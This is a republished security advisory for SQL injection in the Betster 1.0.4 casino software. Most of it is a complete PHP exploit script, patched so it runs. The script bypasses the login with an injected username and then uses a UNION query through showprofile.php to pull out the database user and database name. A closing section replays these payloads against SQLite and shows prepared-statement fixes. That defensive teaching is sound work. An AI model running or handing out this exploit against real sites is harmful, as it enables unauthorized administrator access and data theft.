Betster (also known as PHP Betoffice) is online casino software built on PHP, MySQL and JavaScript.
Betster 1.0.4 is vulnerable to SQL injection. The showprofile.php and categoryedit.php scripts pass the 'id' parameter through htmlspecialchars() and nothing else, and index.php does not sanitize the 'username' parameter in its login function. htmlspecialchars() is an HTML output encoder, not a SQL escaper: it leaves SQL metacharacters such as comment sequences and UNION alone, and with PHP's pre-8.1 default flags (ENT_COMPAT) it does not touch the single quote either, so a quote in 'id' reaches the query intact. A remote attacker can use either flaw to execute arbitrary SQL commands; the exploit below chains the login bypass with a UNION query that extracts the database user and database name.
Vulnerable code (the start of the showprofile.php excerpt was lost in extraction)
-----------------------------------------------------------------------------
/showprofile.php
-----------------------------------------------------------------------------
... getState()) && (($user->getStatus() == "administrator") || ($user->getStatus() == "betmaster"))){
    $mainhtml = file_get_contents("tpl/showprofile.inc");
    $id = htmlspecialchars($_GET['id']);
    getUserById($id);
-----------------------------------------------------------------------------
/categoryedit.php (LINE: 52)
-----------------------------------------------------------------------------
$id = htmlspecialchars($_GET['id']);

Exploit (PHP, CWH Underground Hacking Team). Extraction dropped the head of the script (header comment, usage banner and the http_send() helper) and the backslashes of the "\n" / "\r\n" escapes. The escapes are restored below; the http_send() helper and the argument check are reconstructed so the script runs and are marked as such.
-----------------------------------------------------------------------------
<?php
// http_send(): reconstructed helper, not recovered from the page. Sends one raw
// HTTP request to the target on TCP port 80 and returns the whole response.
function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die("\n[-] No response from {$host}:80\n");
    fputs($sock, $packet);
    return stream_get_contents($sock);
}

if ($argc < 3) {   // reconstructed argument check; the original usage banner is lost
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /betster/\n";
    die();
}

$host = $argv[1];
$path = $argv[2];

// Login bypass: username=admin' or 'a'='a (URL-encoded); the password is irrelevant.
$payload = "username=admin%27+or+%27a%27%3D%27a&password=cwh&login=LOGIN";

// First request only fetches a session cookie from the front page.
$packet  = "GET {$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";

print "\n ,--^----------,--------,-----,-------^--,     \n";
print " | |||||||||   `--------'     |          O      \n";
print " `+---------------------------^----------|      \n";
print "   `\_,-------, _________________________|      \n";
print "     / XXXXXX /`|     /                          \n";
print "    / XXXXXX /  `\   /                           \n";
print "   / XXXXXX /\______(                            \n";
print "  / XXXXXX /                                     \n";
print " / XXXXXX /   .. CWH Underground Hacking Team .. \n";
print "(________(                                       \n";
print " `------'                                        \n";

$response = http_send($host, $packet);
if (!preg_match("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n");

// Log in with the injected username; success is detected by the ADMIN menu title in the response.
$packet  = "POST {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$sid[1]}\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";

print "\n\n[+] Bypassing Authentication...\n";
sleep(2);
$response = http_send($host, $packet);
preg_match('/menutitle">ADMIN/s', $response) ? print "\n[+] Authentication Bypass Successfully !!\n" : die("\n[-] Bypass Authentication Failed !!\n");

// UNION-based injection through showprofile.php?id= using the session just obtained. Decoded:
//   id=1' and 1=2 union select 1,concat('::','User=',user(),' , DB_Name=',database(),'::'),3,4,5,6,7--
// The hex literals (0x3a3a = "::", 0x557365723d = "User=", 0x202c2044425f4e616d653d = " , DB_Name=")
// are the same strings written without quotes; seven columns match the original SELECT.
$packet  = "GET {$path}showprofile.php?id=1%27%20and%201=2%20union%20select%201,concat(0x3a3a,0x557365723d,user(),0x202c2044425f4e616d653d,database(),0x3a3a),3,4,5,6,7--+ HTTP/1.0\r\n";
$packet .= "Cookie: {$sid[1]}\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";

print "[+] Performing SQL Injection Attack\n";
sleep(2);
$response1 = http_send($host, $packet);
// The markers "::" delimit the injected string in the rendered profile page.
preg_match('/::(.*)::/', $response1, $m) ? print "\n$m[1]\n" : die("\n[-] Exploit failed!\n");

################################################################################################################
# Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
?>
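Why htmlspecialchars() does not stop the injection, and what does, as an added example that is not Betster's code nor part of the original exploit. It replays both sinks from the advisory against an in-memory SQLite database (an assumption standing in for Betster's MySQL backend; the pdo_sqlite extension must be loaded). The table, the query text and the function names are constructed for illustration, since the real Betster queries are not shown on this page, and sqlite_version() stands in for the user()/database() calls of the original payload.

```php
<?php
// Added example (not Betster's code). Assumptions: SQLite stands in for MySQL,
// the users table and the query strings are constructed stand-ins for the
// pattern the advisory describes, and the hardened functions are the fix.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, status TEXT)");
$db->exec("INSERT INTO users VALUES (1, 'admin', 's3cret', 'administrator'), (2, 'bob', 'hunter2', 'user')");

// --- Vulnerable: mirrors the advisory. htmlspecialchars() encodes for HTML,
// not SQL. ENT_COMPAT is passed explicitly to reproduce the pre-8.1 default,
// under which the single quote is not touched at all.
function vulnerable_profile(PDO $db, string $id): array
{
    $id  = htmlspecialchars($id, ENT_COMPAT);
    $sql = "SELECT username, status FROM users WHERE id = '$id'";   // string interpolation: injectable
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

function vulnerable_login(PDO $db, string $user, string $pass): ?array
{
    $sql = "SELECT username, status FROM users WHERE username = '$user' AND password = '$pass'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// --- Hardened: prepared statements keep user data out of the SQL grammar; an
// integer key is additionally validated so that nothing but digits reaches it.
function safe_profile(PDO $db, string $id): array
{
    if (!ctype_digit($id)) {
        return [];                                   // reject anything that is not a plain integer
    }
    $st = $db->prepare("SELECT username, status FROM users WHERE id = ?");
    $st->execute([(int) $id]);
    return $st->fetchAll(PDO::FETCH_ASSOC);
}

function safe_login(PDO $db, string $user, string $pass): ?array
{
    $st = $db->prepare("SELECT username, status FROM users WHERE username = ? AND password = ?");
    $st->execute([$user, $pass]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Payloads taken from the exploit on this page, URL-decoded. The profile payload
// uses two UNION columns because the stand-in SELECT has two; the original needs seven.
$idPayload    = "1' and 1=2 union select 'pwned', sqlite_version() -- ";
$loginPayload = "admin' or 'a'='a";

print "vulnerable_profile:\n"; print_r(vulnerable_profile($db, $idPayload));        // attacker-controlled UNION row
print "vulnerable_login:\n";   print_r(vulnerable_login($db, $loginPayload, 'cwh')); // admin row, password never checked
print "safe_profile:\n";       print_r(safe_profile($db, $idPayload));              // payload rejected before any SQL runs
print "safe_login:\n";         var_dump(safe_login($db, $loginPayload, 'cwh'));     // no match: the quote is just data
```

Run it with `php` on the command line. The vulnerable functions return a row the attacker chose (the UNION result) and the administrator account without a valid password, because `'a'='a'` is ORed onto the WHERE clause; the hardened ones return nothing for the same inputs. When the backend is MySQL rather than SQLite, the same PDO code applies; set the connection charset in the DSN (for example `charset=utf8mb4`) so that client-side quoting under emulated prepares cannot be confused by multibyte sequences, or disable `PDO::ATTR_EMULATE_PREPARES` to use server-side prepares.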
Article source: lcx.cc, "Betster SQL injection vulnerability".